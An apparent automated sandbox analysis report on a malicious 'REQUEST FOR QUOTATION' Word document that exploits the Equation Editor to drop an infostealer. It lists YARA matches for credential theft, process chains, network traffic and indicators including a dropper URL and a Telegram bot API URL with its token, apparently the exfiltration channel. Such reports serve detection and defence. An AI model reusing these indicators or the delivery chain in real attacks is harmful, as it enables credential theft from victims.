                      Source: html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: mpTrle.exe.10.dr, html.exe.8.dr, html[1].exe.8.drString found in binary or memory: http://tempuri.org/DataSet1.xsd)Microsoft
                      Source: u7xc.url.0.drString found in binary or memory: http://wbze.de/u7xc
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: html.exe, 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: html.exe, 0000000A.00000002.656186717.0000000002932000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipif8
                      Source: html.exe, 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/T0
                      Source: html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/TX
                      Source: mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/Tb
                      Source: html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/p
                      Source: html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: html.exe, 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6981982105:AAGJZG7U4ELI-QLExHS4a6AlsLp__P5_opc/
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: u7xc[1].htm.0.drString found in binary or memory: https://wbze.de/u7xc
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                      Source: unknownHTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49169 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.22:49173 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.22:49174 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 9.2.html.exe.3b55730.9.raw.unpack, cPKWk.cs.Net Code: _00jhmIFO
                      Source: 9.2.html.exe.3b1a710.10.raw.unpack, cPKWk.cs.Net Code: _00jhmIFO

                      System Summary

                      barindex
                      Source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\u7xc.urlJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\rz on 104.168.33.34.urlJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\html.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 770B0000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 770B0000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_0025A4009_2_0025A400
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_002504D89_2_002504D8
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_002567A09_2_002567A0
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_0025F1509_2_0025F150
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_002511C09_2_002511C0
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_0025DA2F9_2_0025DA2F
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_0025CA289_2_0025CA28
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_0025E2C09_2_0025E2C0
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_0025ED189_2_0025ED18
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_002545BA9_2_002545BA
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_0025DE889_2_0025DE88
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_0025678F9_2_0025678F
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_00D300409_2_00D30040
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_00D36E089_2_00D36E08
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 9_2_00D3A7089_2_00D3A708
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 10_2_002E38F010_2_002E38F0
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 10_2_002E935010_2_002E9350
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 10_2_002E450810_2_002E4508
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 10_2_002E8EF010_2_002E8EF0
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 10_2_002EC78B10_2_002EC78B
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 10_2_002E3C3810_2_002E3C38
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 10_2_002EC6A010_2_002EC6A0
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 10_2_0082004010_2_00820040
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 10_2_0082717810_2_00827178
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 10_2_0082621910_2_00826219
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 10_2_0082266810_2_00822668
                      Source: C:\Users\user\AppData\Roaming\html.exeCode function: 10_2_008293A010_2_008293A0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_0025A40011_2_0025A400
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_002504D811_2_002504D8
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_002567A011_2_002567A0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_0025F14111_2_0025F141
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_0025F15011_2_0025F150
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_002511C011_2_002511C0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_0025DA2F11_2_0025DA2F
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_0025CA2811_2_0025CA28
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_0025E2C011_2_0025E2C0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_0025ED1811_2_0025ED18
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_0025DE8811_2_0025DE88
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_0025678F11_2_0025678F
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_041D6E0811_2_041D6E08
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_041D000611_2_041D0006
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_041D004011_2_041D0040
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 11_2_041DA70811_2_041DA708
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_003638F012_2_003638F0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_0036C2C812_2_0036C2C8
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_0036450812_2_00364508
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_0036F6A812_2_0036F6A8
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_00368F7812_2_00368F78
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_0036E9B812_2_0036E9B8
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_00363C3812_2_00363C38
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_0036F7CF12_2_0036F7CF
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_008B68A812_2_008B68A8
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_008B594812_2_008B5948
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_008B1D9812_2_008B1D98
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_008B8AD012_2_008B8AD0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 12_2_0036C67812_2_0036C678
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_0038A40014_2_0038A400
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_003804D814_2_003804D8
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_003867A014_2_003867A0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_0038F15014_2_0038F150
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_0038F14114_2_0038F141
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_003811C014_2_003811C0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_0038CA2814_2_0038CA28
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_0038DA2F14_2_0038DA2F
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_0038CA1914_2_0038CA19
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_0038E2C014_2_0038E2C0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_0038ED1814_2_0038ED18
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_0038DE8814_2_0038DE88
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_0038678F14_2_0038678F
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_047E004014_2_047E0040
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_047E6E0814_2_047E6E08
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_047E000714_2_047E0007
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 14_2_047EA70814_2_047EA708
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_003938F016_2_003938F0
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_0039F26016_2_0039F260
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_00398B3016_2_00398B30
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_0039450816_2_00394508
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_0039BE8016_2_0039BE80
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_00393C3816_2_00393C38
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_0039E57216_2_0039E572
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_0045654816_2_00456548
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_004555E916_2_004555E9
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_0045163816_2_00451638
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_0045877016_2_00458770
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeCode function: 16_2_0039C23016_2_0039C230
                      Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                      Source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                      Source: html[1].exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: html.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 9.2.html.exe.330000.0.raw.unpack, -.csCryptographic APIs: 'CreateDecryptor'
                      Source: 9.2.html.exe.330000.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.html.exe.330000.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.html.exe.4f0000.2.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                      Source: 9.2.html.exe.4f0000.2.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                      Source: 9.2.html.exe.3b55730.9.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.html.exe.3b55730.9.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.html.exe.3b55730.9.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.html.exe.3b55730.9.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, SKNwGsNRwam5llK5t6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, SKNwGsNRwam5llK5t6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, sqh1bsK2vmbKu3bQAB.csSecurity API names: _0020.SetAccessControl
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, sqh1bsK2vmbKu3bQAB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 9.2.html.exe.5e60000.12.raw.unpack, sqh1bsK2vmbKu3bQAB.csSecurity API names: _0020.AddAccessRule
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, sqh1bsK2vmbKu3bQAB.csSecurity API names: _0020.SetAccessControl
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, sqh1bsK2vmbKu3bQAB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, sqh1bsK2vmbKu3bQAB.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@27/33@11/5
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$QUEST FOR QUOTATION.docx.docJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMutant created: \Sessions\1\BaseNamedObjects\hjnXhvOmXexOicqL
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMutant created: NULL
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR65B4.tmpJump to behavior
                      Source: REQUEST FOR QUOTATION.docx.docOLE indicator, Word Document stream: true
                      Source: REQUEST FOR QUOTATION.docx.docOLE indicator, Word Document stream: true
                      Source: REQUEST FOR QUOTATION.docx.docOLE indicator, Word Document stream: true
                      Source: REQUEST FOR QUOTATION.docx.docOLE indicator, Word Document stream: true
                      Source: REQUEST FOR QUOTATION.docx.docOLE indicator, Word Document stream: true
                      Source: REQUEST FOR QUOTATION.docx.docOLE indicator, Word Document stream: true
                      Source: REQUEST FOR QUOTATION.docx.docOLE indicator, Word Document stream: true
                      Source: REQUEST FOR QUOTATION.docx.docOLE document summary: title field not present or empty
                      Source: REQUEST FOR QUOTATION.docx.docOLE document summary: title field not present or empty
                      Source: REQUEST FOR QUOTATION.docx.docOLE document summary: title field not present or empty
                      Source: REQUEST FOR QUOTATION.docx.docOLE document summary: title field not present or empty
                      Source: REQUEST FOR QUOTATION.docx.docOLE document summary: title field not present or empty
                      Source: REQUEST FOR QUOTATION.docx.docOLE document summary: title field not present or empty
                      Source: REQUEST FOR QUOTATION.docx.docOLE document summary: title field not present or empty
                      Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.drOLE document summary: title field not present or empty
                      Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.drOLE document summary: author field not present or empty
                      Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.drOLE document summary: edited time not present or 0
                      Source: C:\Users\user\AppData\Roaming\html.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: REQUEST FOR QUOTATION.docx.docVirustotal: Detection: 9%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\html.exe "C:\Users\user\AppData\Roaming\html.exe"
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess created: C:\Users\user\AppData\Roaming\html.exe "C:\Users\user\AppData\Roaming\html.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
